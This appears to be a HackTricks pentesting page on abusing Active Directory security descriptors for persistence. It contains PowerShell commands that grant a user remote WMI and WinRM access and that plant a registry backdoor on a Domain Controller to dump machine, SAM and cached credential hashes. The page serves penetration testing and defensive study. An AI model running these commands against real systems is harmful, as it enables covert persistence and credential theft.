hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md
2022-05-01 13:25:53 +00:00

4.3 KiB
Raw Blame History

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.

Security Descriptors

Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL:: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

The security descriptors are used to store the permissions an object has over an object. If you can just make a little change in the security descriptor of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.

Then, this persistence technique is based on the hability to win every privilege needed against certain objects, to be able to perform a task that usually requires admin privileges but without the need of being admin.

You can give a user access to execute remotely WMI using this:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Give access to winrm PS console to a user using this:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Access the registry and dump hashes creating a Reg backdoor using DAMP, so you can at any moment retrieve the hash of the computer, the SAM and any cached AD credential in the computer. So, it's very useful to give this permission to a regular user against a Domain Controller computer:

Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.